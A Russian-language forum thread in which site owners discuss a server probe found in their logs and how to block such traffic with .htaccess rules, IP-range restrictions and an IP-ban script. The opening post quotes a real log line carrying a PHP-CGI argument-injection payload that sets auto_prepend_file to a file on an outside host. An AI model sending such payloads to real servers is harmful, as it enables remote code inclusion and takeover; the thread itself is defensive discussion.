Нащупывают уязвимости сервера
Страницы: 1
Нащупывают уязвимости сервера
Сегодня заметил, что сайт долго открывается, полез в логи (вдруг доссят подумал я)

Заметил странный повторяющийся запрос:
Цитата
12.175.18.217 - - [07/Oct/2013:00:27:14 +0600] "GET /?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt HTTP/1.0" 403 482 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"
По ссылке http://61.19.253.26/echo.txt нашлось следующее:

Код
<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

По этому куску кода нашлось следующее: https://plus.google.com/110937633080014620803/posts/TKa9TUWafjs
Как я понял, мой сервер нащупывают..

Пока запретил данному айпи коннектиться к серверу через .htaccess
Что посоветуете? Кто-то с таким сталкивался?
Не подписываюсь на темы, так что не слежу за вопросами, которые вы оставляете в топике после меня. Если нужно получить ответ, пишите в ЛС с указанием ссылки на мой комментарий.
У меня время от времени подобных запросов просто шквал появляется. Пока тьфу - тьфу все в порядке. Правда половина из них направленна на поиск уязвимостей базы данных, которая в моем случае отсутствует:) Также ограничил доступ к серверу по ip
Выставляем правильные права на директории.

Также, в хтаксесс вставляем:

Код
Order allow,deny
Deny from all
Изменено: GoogleBot - 6 Октября 2013 23:06
Цитата
Олег пишет:
ограничил доступ к серверу по ip
Как-то много было ботов и всякого, и утомительно получалось все время по ftp в htaccess заходить. Небольшой скрипт помог упростить задачу (в обход htaccess) - и, что самое интересное, потихоньку перестали "долбится" время от времени новый всплывает, но это уже несравнимо с прежним:

Запрет/бан доступа на сайт/страницу по ip через php: _http://coder.hol.es/archive/ban_ip_php
Цитата
Coder пишет:
утомительно
Ничего себе решение для утомительно...
Честно, улыбнуло... ваш способ не легче.
Цитата
Алик Яушев пишет:
Честно, улыбнуло... ваш способ не легче.
=) Легче таки. По ftp нужно входить, открывать htaccess, смотреть лог, сравнивать, внесен или нет ip (а если их 100 и более?). А здесь удобно - зашел в админку, вызвал всплывающее окно, расположил его в окне лога, выбрал все нужные ip и тут же внес и сохранил. Если были дубли - убралось, все остальное - записалось и отсортировалось. В ftp не нужно входить, htaccess трогать не нужно.

Имхо, конечно.
В моем случае все делаю через SSH клиент.
Выявляю запросы: tail -f /var/log/apache2/site_access.log
Через тот же клиент делаю корректировку в штацесс. Дело 2-ух минут максимум.
Я не любитель сторонних php скриптов.
Цитата
Алик Яушев пишет:
Я не любитель сторонних php скриптов
Понятно. Каждый выбирает по-своему.
Цитата
Coder пишет:
Олег пишет:
ограничил доступ к серверу по ipКак-то много было ботов и всякого, и утомительно получалось все время по ftp в htaccess заходить. Небольшой скрипт помог упростить задачу (в обход htaccess) - и, что самое интересное, потихоньку перестали "долбится" время от времени новый всплывает, но это уже несравнимо с прежним:
Так я не ip баню, а ограничил доступ к серверу по ip, т.е. к шелу и ftp можно подключиться только с моего ip. Тоже самое касается  админки каждого сайта. А каждый ip банить - это гиблое дело
Олег, хотел тоже как и вы ограничить доступ только своим ипом, да только задумался и передумал. А задумался вот над какими вопросами: 

IP та у меня динамический, как быть тогда?
А вдруг нужно будет срочно с чужой точки доступа зайти (в гостях или командировке), как тогда быть?
Цитата
Индульгенция пишет:
IP та у меня динамический, как быть тогда?
У меня тоже, мегафон - модем. Попросил у них диапазон ip своего региона и сделал фильтр по маске
Цитата
Индульгенция пишет:
А вдруг нужно будет срочно с чужой точки доступа зайти (в гостях
У вас такая необходимость часто появляется? У меня за 3 года работы в сети не разу.
Цитата
Индульгенция пишет:
командировке
Заблаговременно изменить фильтр либо убрать его вообще на время командировки
Цитата
Олег пишет:
У меня тоже, мегафон - модем. Попросил у них диапазон ip своего региона и сделал фильтр по маске
Этот вопрос решен. теперь знаю ответ.

Цитата
Олег пишет:
У вас такая необходимость часто появляется? У меня за 3 года работы в сети не разу.
А вот это как раз бывает. Не совсем часто, но раза 2-3 в месяц. Подойдет только:

Цитата
Олег пишет:
убрать его вообще на время
Цитата
Индульгенция пишет:
А вот это как раз бывает. Не совсем часто, но раза 2-3 в месяц. Подойдет только:
Мобильный модем и ходите с ним в гости:)
"Убедили" smile:) . Осталось теперь реализовать. Спасибо за информацию.
Цитата
Олег пишет:
А каждый ip банить - это гиблое дело
Тут от ситуации зависит. Тут комплексный подход к ряду проблем: например, некоторые боты, так сказать, злостные, оставляли рекламу в отзывах, форумах. ip один и тот же - "долбятся" по-тупому, так сказать, ресурсы кушают. Этих - сразу в бан, для остальных - капчу математическую или картиночную.

Но, как уже было сказано, каждый свое выбирает.

Имхо, конечно.

Кстати, на некоторых хостингах (jino, например), можно вообще отключать доступ по ftp и подключать по необходимости из аккаунта.
Изменено: Coder - 7 Октября 2013 18:56
Страницы: 1